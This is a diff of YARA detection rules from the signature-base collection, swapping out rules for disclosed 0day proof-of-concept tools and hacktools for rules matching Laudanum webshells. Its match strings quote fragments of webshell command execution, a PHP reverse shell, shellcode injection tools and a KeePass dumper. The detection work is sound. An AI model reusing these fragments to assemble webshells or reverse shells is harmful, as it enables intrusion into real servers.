-		hash2 = "a5916cefa0f50622a30c800e7f21df481d7a3e1e12083fef734296a22714d088"
-		hash3 = "5b701a5b5bbef7027711071cef2755e57984bfdff569fe99efec14a552d8ee43"
 
 	strings:
-		$x1 = "msiexec /f c:\\users\\%username%\\downloads\\" ascii
-		$x2 = "c:\\users\\%username%\\downloads\\bat.bat" fullword ascii
-		$x3 = "\\payload.msi /quiet" ascii
-		$x4 = "\\payload2\\WindowsTrustedRTProxy.sys" wide
-		$x5 = "\\payload2" wide
-		$x6 = "\\payload" wide
-		$x7 = "WindowsTrustedRTProxy.sys /grant:r administrators:RX" ascii
+		$s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii
+		$s2 = "%ComSpec% /c dir" fullword ascii
+		$s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii
+		$s4 = "Server.ScriptTimeout = 180" fullword ascii
+		$s5 = "cmd = Request.Form(\"cmd\")" fullword ascii
+		$s6 = "' ***  http://laudanum.secureideas.net" fullword ascii
+		$s7 = "Dim wshell, intReturn, strPResult" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them )
+		filesize < 15KB and 4 of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Exploit : FILE
+rule SIGNATURE_BASE_Settings : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file settings.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72b8aafd-d79a-5812-90fd-5d5aca109254"
-		date = "2017-07-07"
-		modified = "2025-04-14"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3711-L3725"
+		id = "054b8723-fdfa-51dc-91ae-b915e40b2e54"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L68-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12a7a04fdc621242f42107204996e44b1962b5ac5eef4f9b9cbbe0ad52b85676"
+		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
+		logic_hash = "b02e293e659fa77257d0642c57e51d6ae712d9221ae295cf69bb845f68c650ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "632d35a0bac27c9b2f3f485d43ebba818089cf72b3b8c4d2e87ce735b2e67d7e"
 
 	strings:
-		$x1 = "\\Release\\exploit.pdb" ascii
-		$x2 = "\\favorites\\stolendata.txt" wide
+		$s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii
+		$s2 = "<li>Reverse Shell - " fullword ascii
+		$s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injectdll : FILE
+rule SIGNATURE_BASE_Asp_Proxy : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file proxy.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90a4dca0-4f12-5946-9d5d-0b93bb5a3c5d"
-		date = "2017-07-07"
-		modified = "2022-12-21"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3727-L3745"
+		id = "6193b48a-b3da-5c1e-84e8-0035d9e7ade6"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L85-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0a9bd4fa2d8a1192258b303cb757c8bbce7f6962a1d895f57add8a1c3887799"
+		hash = "51e97040d1737618b1775578a772fa6c5a31afd8"
+		logic_hash = "f53c97a2bf31f411b3220dc741b85d0edf96e9b92474f1abd5ac443be6b92897"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "173d3f78c9269f44d069afbd04a692f5ae42d5fdc9f44f074599ec91e8a29aa2"
 
 	strings:
-		$x1 = "\\Release\\InjectDll.pdb" ascii
-		$x2 = "Specify -l to list all IE processes running in the current session" fullword ascii
-		$x3 = "Usage: InjectDll -l|pid PathToDll" fullword ascii
-		$x4 = "Injecting DLL: %ls into PID: %d" fullword ascii
-		$x5 = "Error adjusting privilege %d" fullword ascii
+		$s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii
+		$s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii
+		$s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii
+		$s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii
+		$s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii
+		$s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Payload_MSI : FILE
+rule SIGNATURE_BASE_Cfm_Shell : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file shell.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe32af56-d5a1-5246-a7df-395b9cd02faf"
-		date = "2017-07-07"
-		modified = "2022-12-21"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3747-L3763"
+		id = "5308eecf-a59f-5100-ab60-5034c5b73e7e"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L105-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7dfc8d2bd871ad6acb7d362a946d34ed1830f42ab625c3d3d9cb512f28ccdb57"
+		hash = "885e1783b07c73e7d47d3283be303c9719419b92"
+		logic_hash = "961eb398422e3c528b886c150f11dcb8a6832f0ea48e20ddc381e1f2740bd0c6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a7c498a95850e186b7749a96004a98598f45faac2de9b93354ac93e627508a87"
 
 	strings:
-		$s1 = "WShell32.dll" fullword wide
-		$s2 = "Target empty, so account name translation begins on the local system." fullword wide
-		$s3 = "\\custact\\x86\\AICustAct.pdb" ascii
+		$s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii
+		$s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii
+		$s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
+		filesize < 20KB and 2 of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injector : FILE
+rule SIGNATURE_BASE_Aspx_Shell : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file shell.aspx"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6de89a84-fe16-5064-8cbb-a3b9003f4c0c"
-		date = "2017-07-07"
-		modified = "2025-04-14"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3765-L3785"
+		id = "d4287007-79af-59fa-b8c8-3ac08d75b3bd"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L122-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "37ed19fe19d3645adcd5fa7d6f6b3572d2821fdb78a6d0c8afdba6ccecfc8528"
+		hash = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
+		logic_hash = "b31c36f53d46e17b6d97e582e46c540928a386e2075b841f5c11b959a0c68462"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041"
 
 	strings:
-		$x1 = "\\Release\\injector.pdb" ascii
-		$x2 = "Cannot write the shellcode in the process memory, error: " fullword ascii
-		$x3 = "/s shellcode_file PID: shellcode injection." fullword ascii
-		$x4 = "/d dll_file PID: dll injection via LoadLibrary()." fullword ascii
-		$x5 = "/s shellcode_file PID" fullword ascii
-		$x6 = "Shellcode copied in memory: OK" fullword ascii
-		$x7 = "Usage of the injector. " fullword ascii
-		$x8 = "KO: cannot obtain the SeDebug privilege." fullword ascii
+		$s1 = "remoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new" ascii
+		$s2 = "remoteIp = Request.UserHostAddress;" fullword ascii
+		$s3 = "<form method=\"post\" name=\"shell\">" fullword ascii
+		$s4 = "<body onload=\"document.shell.c.focus()\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them ) or 3 of them
+		filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe_2 : FILE
+rule SIGNATURE_BASE_Php_Shell : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9326bbae-81ee-588e-8581-628b47d348f8"
-		date = "2017-07-07"
-		modified = "2025-04-14"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3787-L3802"
+		id = "8d3dcb16-090b-5a9f-b3d2-3822ec467f69"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L140-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9ca23e4375674ea189d5e9de015f6a1ae16c30d35378580bdc8f42007b716df"
+		hash = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
+		logic_hash = "dc798508434686bbcb4fa0bb47381252bfa0491b0987956fd4c5aa13b7f57810"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b4f3787a19b71c47bc4357a5a77ffb456e2f71fd858079d93e694a6a79f66533"
 
 	strings:
-		$s1 = "\\cmd.exe\" /k wusa c:\\users\\" ascii
-		$s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii
-		$s3 = "Folder Created: " fullword wide
+		$s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii
+		$s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii
+		$s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii
+		$s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them )
+		filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Shellcodegenerator : FILE
+rule SIGNATURE_BASE_Php_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file php-reverse-shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "49250cbe-7bbd-5462-9324-1a8f350386f3"
-		date = "2017-07-07"
-		modified = "2025-04-14"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3804-L3817"
+		id = "306d150f-95a8-57fd-8f5e-786c429af6b3"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L158-L173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b267a816871c30e9403805b942be25ed8e28ad2fd946f234f6877a65420754d8"
+		hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"
+		logic_hash = "ea8e320abb57e0467db92271f7d36f144f85e04ce15cd9fa8d3f53dfa8d43929"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "55c4073bf8d38df7d392aebf9aed2304109d92229971ffac6e1c448986a87916"
 
 	strings:
-		$x1 = "\\Release\\shellcodegenerator.pdb" ascii
+		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
+		$s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii
+		$s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_Securityxploded_Producer_String : FILE
+rule SIGNATURE_BASE_Php_Dns : FILE
 {
 	meta:
-		description = "Detects hacktools by SecurityXploded"
+		description = "Laudanum Injector Tools - file dns.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "739c4ba1-5126-51cc-a2dd-cdac2737e29a"
-		date = "2017-07-13"
-		modified = "2025-04-14"
-		reference = "http://securityxploded.com/browser-password-dump.php"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3819-L3833"
+		id = "a52e453b-07aa-58b9-91e7-f2426a8e8976"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L175-L191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "101e0b8b8aeb8ed4314bc07139dcc2b40600fde82ff786d15a15c10692f9aa4a"
-		score = 60
+		hash = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+		logic_hash = "650eecc06f215ae6a15078c87d8a8c1597ca9e3d735eacd17b046a9d9deb6aa8"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59"
 
 	strings:
-		$x1 = "http://securityxploded.com" fullword ascii
+		$s1 = "$query = isset($_POST['query']) ? $_POST['query'] : '';" fullword ascii
+		$s2 = "$result = dns_get_record($query, $types[$type], $authns, $addtl);" fullword ascii
+		$s3 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
+		$s4 = "foreach (array_keys($types) as $t) {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them )
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_Kekeo_Hacktool : FILE
+rule SIGNATURE_BASE_WEB_INF_Web : FILE
 {
 	meta:
-		description = "Detects Kekeo Hacktool"
+		description = "Laudanum Injector Tools - file web.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4158da8-fc4d-5dc6-b44c-f5325b3bb8ca"
-		date = "2017-07-21"
-		modified = "2025-04-14"
-		reference = "https://github.com/gentilkiwi/kekeo/releases"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3845-L3860"
+		id = "8d0a008c-56d1-59ef-8521-0697add21ba9"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L193-L207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14283064e7c8fcee9cde206d25b43b02876a7a4d5de9da6dab47d7f5ba54f019"
+		hash = "0251baed0a16c451f9d67dddce04a45dc26cb4a3"
+		logic_hash = "b58bb63a5268812ed6a5d18c8da96b0fdae33e4802a2fba4964ab69e92517a16"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ce92c0bcdf63347d84824a02b7a448cf49dd9f44db2d02722d01c72556a2b767"
-		hash2 = "49d7fec5feff20b3b57b26faccd50bc05c71f1dddf5800eb4abaca14b83bba8c"
 
 	strings:
-		$x1 = "[ticket %u] session Key is NULL, maybe a TGT without enough rights when WCE dumped it." fullword wide
-		$x2 = "ERROR kuhl_m_smb_time ; Invalid! Command: %02x - Status: %08x" fullword wide
+		$s1 = "<servlet-name>Command</servlet-name>" fullword ascii
+		$s2 = "<jsp-file>/cmd.jsp</jsp-file>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) ) )
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Allthethings : FILE
+rule SIGNATURE_BASE_Jsp_Cmd : FILE
 {
 	meta:
-		description = "Detects AllTheThings"
+		description = "Laudanum Injector Tools - file cmd.war"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3169ca7-3482-5d55-a1d9-6d1c01349922"
-		date = "2017-07-27"
-		modified = "2022-12-21"
-		reference = "https://github.com/subTee/AllTheThings"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3873-L3892"
+		id = "74db62b8-82d5-5a34-aa72-2f85053715a4"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L209-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d6b961afb98cfaefe930a7bc246b3f087469b752a8d4abb62b2826418fdfd53"
+		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"
+		logic_hash = "ab5b013a385549322bcb2811fa1a2d14b5633e2c41b9486b1e1c50c02437b8e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5a0e9a9ce00d843ea95bd5333b6ab50cc5b1dbea648cc819cfe48482513ce842"
 
 	strings:
-		$x1 = "\\obj\\Debug\\AllTheThings.pdb" ascii
-		$x2 = "AllTheThings.exe" fullword wide
-		$x3 = "\\AllTheThings.dll" ascii
-		$x4 = "Hello From Main...I Don't Do Anything" fullword wide
-		$x5 = "I am a basic COM Object" fullword wide
-		$x6 = "I shouldn't really execute either." fullword wide
+		$s0 = "cmd.jsp}" fullword ascii
+		$s1 = "cmd.jspPK" fullword ascii
+		$s2 = "WEB-INF/web.xml" fullword ascii
+		$s3 = "WEB-INF/web.xmlPK" fullword ascii
+		$s4 = "META-INF/MANIFEST.MF" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+		uint16( 0 ) == 0x4b50 and filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_Impacket_Keyword : FILE
+rule SIGNATURE_BASE_Laudanum : FILE
 {
 	meta:
-		description = "Detects Impacket Keyword in Executable"
+		description = "Laudanum Injector Tools - file laudanum.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a92962e6-1b05-583b-8b06-f226bdea88e2"
-		date = "2017-08-04"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3894-L3911"
+		id = "8c836aba-3644-5914-a3ff-937d0a6cd378"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L228-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "92a911dc36f8e74ad49ae09ef4dd997b968a2dde46a7500c98983fafb84a086e"
-		score = 60
+		hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
+		logic_hash = "53caad87d22b5f13e5b7be8720baa1d436cc57d8062ec5d557df8524a2ccfb68"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9388c78ea6a78dbea307470c94848ae2481481f593d878da7763e649eaab4068"
-		hash2 = "2f6d95e0e15174cfe8e30aaa2c53c74fdd13f9231406b7103da1e099c08be409"
 
 	strings:
-		$s1 = "impacket.smb(" ascii
-		$s2 = "impacket.ntlm(" ascii
-		$s3 = "impacket.nmb(" ascii
+		$s1 = "public function __activate()" fullword ascii
+		$s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 14000KB and 1 of them )
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_Passwordspro : FILE
+rule SIGNATURE_BASE_Php_File : FILE
 {
 	meta:
-		description = "Auto-generated rule - file PasswordsPro.exe"
+		description = "Laudanum Injector Tools - file file.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c749f883-364e-5f65-9eb8-3dcd74495f7c"
-		date = "2017-08-27"
-		modified = "2025-04-14"
-		reference = "PasswordPro"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3924-L3942"
+		id = "68456891-6828-5e42-b8a0-67ecaf83cdc0"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L244-L260"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "24887c3a7e4997c9a4e5d3317a5684b0eca7ccc0ffb213660dd9b37bb220f514"
+		hash = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+		logic_hash = "85c14a9c8a6aece231b1cb6dcdd7ed39fdc6aced868c34557ee2e2204ce7007b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5b3d6654e6d9dc49ee1136c0c8e8122cb0d284562447abfdc05dfe38c79f95bf"
 
 	strings:
-		$s1 = "No users marked for attack or all marked users already have passwords found!" fullword ascii
-		$s2 = "%s\\PasswordsPro.ini.Dictionaries(%d)" fullword ascii
-		$s3 = "Passwords processed since attack start:" fullword ascii
+		$s1 = "$allowedIPs =" fullword ascii
+		$s2 = "<a href=\"<?php echo $_SERVER['PHP_SELF']  ?>\">Home</a><br/>" fullword ascii
+		$s3 = "$dir  = isset($_GET[\"dir\"])  ? $_GET[\"dir\"]  : \".\";" fullword ascii
+		$s4 = "$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		filesize < 10KB and all of them
 }
-
-rule SIGNATURE_BASE_Passwordpro_NTLM_DLL : FILE
+rule SIGNATURE_BASE_Warfiles_Cmd : FILE
 {
 	meta:
-		description = "Auto-generated rule - file NTLM.dll"
+		description = "Laudanum Injector Tools - file cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc86b868-000f-56b1-91cd-4aa8caace1df"
-		date = "2017-08-27"
-		modified = "2025-04-14"
-		reference = "PasswordPro"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3944-L3962"
+		id = "f974255b-cfbe-57b0-af1f-eddb7f12f5ed"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L262-L278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1021fe1a4c7a237d7a7cfcb1db8fa5e6fa640d3dd9f14ed37910a6b847717d36"
+		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"
+		logic_hash = "64724b24d9f5b5d78e231ea8196abb609237cc430c49f6ceeb99c9684a904568"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47d4755d31bb96147e6230d8ea1ecc3065da8e557e8176435ccbcaea16fe50de"
 
 	strings:
-		$s1 = "NTLM.dll" fullword ascii
-		$s2 = "Algorithm: NTLM" fullword ascii
+		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii
+		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii
+		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
+		$s4 = "String disr = dis.readLine();" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and pe.exports ( "GetHash" ) and pe.exports ( "GetInfo" ) and ( all of them ) )
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_Keethief_PS : FILE
+rule SIGNATURE_BASE_Asp_Dns : FILE
 {
 	meta:
-		description = "Detects component of KeeTheft - KeePass dump tool - file KeeThief.ps1"
+		description = "Laudanum Injector Tools - file dns.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a54e8d1-3cae-51e8-8da0-024ac25dc6d0"
-		date = "2017-08-29"
-		modified = "2025-04-14"
-		reference = "https://github.com/HarmJ0y/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3974-L3991"
+		id = "b0e30ca0-7163-5731-98c5-5a1893b8ea80"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L280-L296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d3d4ff3b854c5efad99e6f20121b16d5f2f0a31a4c8efd87a937f857923a5e1"
+		hash = "5532154dd67800d33dace01103e9b2c4f3d01d51"
+		logic_hash = "808e879238a0c24e975c260fc95c05c91bdc0f73553a241bd00f5bf7e6622639"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a3b976279ded8e64b548c1d487212b46b03aaec02cb6e199ea620bd04b8de42f"
 
 	strings:
-		$x1 = "$WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"" fullword ascii
-		$x2 = "if($KeePassProcess.FileVersion -match '^2\\.') {" fullword ascii
+		$s1 = "command = \"nslookup -type=\" & qtype & \" \" & query " fullword ascii
+		$s2 = "Set objCmd = objWShell.Exec(command)" fullword ascii
+		$s3 = "Response.Write command & \"<br>\"" fullword ascii
+		$s4 = "<form name=\"dns\" method=\"POST\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7223 and filesize < 1000KB and ( 1 of ( $x* ) ) )
